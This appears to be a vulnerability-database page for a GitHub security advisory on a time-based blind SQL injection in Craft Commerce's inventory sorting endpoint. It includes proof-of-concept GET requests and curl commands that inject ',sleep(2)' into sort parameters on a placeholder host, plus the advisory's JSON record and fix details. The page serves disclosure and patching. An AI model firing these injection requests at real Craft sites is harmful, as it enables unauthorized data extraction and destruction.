GHSA-PMGJ-GMM4-JH6J

Vulnerability from github – Published: 2026-03-10 18:23 – Updated: 2026-03-10 22:54
VLAI?
Summary
Craft Commerce is vulnerable to SQL Injection in Commerce Inventory Table Sorting
Details

Summary

Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.

PoC

Required Permissions

  • General
    • Access the control panel
    • Access Craft Commerce
  • Craft Commerce
    • Manage inventory stock levels

Steps to reproduce

  1. Log in to the control panel
  2. Navigate to Commerce > Inventory
  3. Click on any sortable column header (e.g., "SKU") to trigger a sort request
  4. Intercept the request and modify sort[0][direction] or sort[0][sortField] parameters and append ,sleep(2) payload to it's current value as follows:
# sort[0][sortField]=sku,sleep(2)
GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku,sleep(2)&sort[0][direction]=asc&inventoryLocationId=1&containerId=%23inventory-levels
# sort[0][direction]=asc,sleep(2)
GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku&sort[0][direction]=asc,sleep(2)&inventoryLocationId=1&containerId=%23inventory-levels
  1. Observe the delay in the response, confirming the injection

Alternatively, you can use the following curl (bash syntax) command (replace cookie and target domain as needed):

# sort[0][sortField]=sku,sleep(2)
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku,sleep(2)&sort%5b0%5d%5bdirection%5d=asc&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'
# sort[0][direction]=asc,sleep(2)
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku&sort%5b0%5d%5bdirection%5d=asc,sleep(2)&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'

Impact

With this Blind SQLi, an attacker can: - Exfiltrate data character-by-character using time-based techniques. - Modify or destroy data (drop tables, update records, alter schema).

Severity ?
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.5.2"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/commerce"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29174"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T18:23:25Z",
    "nvd_published_at": "2026-03-10T20:16:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nCraft Commerce is vulnerable to **SQL Injection** in the inventory levels table data endpoint. The `sort[0][direction]` and `sort[0][sortField]` parameters are concatenated directly into an `addOrderBy()` clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.\n\n---\n## PoC\n### Required Permissions\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n- Craft Commerce\n\t- Manage inventory stock levels \n\n### Steps to reproduce\n1. Log in to the control panel\n2. Navigate to **Commerce** \u003e **Inventory**\n3. Click on any sortable column header (e.g., \"SKU\") to trigger a sort request\n4. Intercept the request and modify `sort[0][direction]` or `sort[0][sortField]` parameters and append `,sleep(2)` payload to it\u0027s current value as follows:\n\n```bash\n# sort[0][sortField]=sku,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort[0][sortField]=sku,sleep(2)\u0026sort[0][direction]=asc\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\n# sort[0][direction]=asc,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort[0][sortField]=sku\u0026sort[0][direction]=asc,sleep(2)\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\n```\n\n6. Observe the delay in the response, confirming the injection\n\nAlternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed):\n```bash\n# sort[0][sortField]=sku,sleep(2)\ncurl --path-as-is -k -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0\u0027 -H $\u0027Accept: application/json, text/plain, */*\u0027 -b $\u0027\u003cCookie\u003e\u0027 $\u0027http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort%5b0%5d%5bfield%5d=purchasable\u0026sort%5b0%5d%5bsortField%5d=sku,sleep(2)\u0026sort%5b0%5d%5bdirection%5d=asc\u0026page=1\u0026per_page=25\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\u0027\n# sort[0][direction]=asc,sleep(2)\ncurl --path-as-is -k -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0\u0027 -H $\u0027Accept: application/json, text/plain, */*\u0027 -b $\u0027\u003cCookie\u003e\u0027 $\u0027http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort%5b0%5d%5bfield%5d=purchasable\u0026sort%5b0%5d%5bsortField%5d=sku\u0026sort%5b0%5d%5bdirection%5d=asc,sleep(2)\u0026page=1\u0026per_page=25\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\u0027\n```\n\n### Impact\nWith this Blind SQLi, an attacker can:\n- **Exfiltrate data** character-by-character using time-based techniques.\n- **Modify or destroy data** (drop tables, update records, alter schema).",
  "id": "GHSA-pmgj-gmm4-jh6j",
  "modified": "2026-03-10T22:54:57Z",
  "published": "2026-03-10T18:23:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29174"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/commerce"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft Commerce is vulnerable to SQL Injection in Commerce Inventory Table Sorting"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.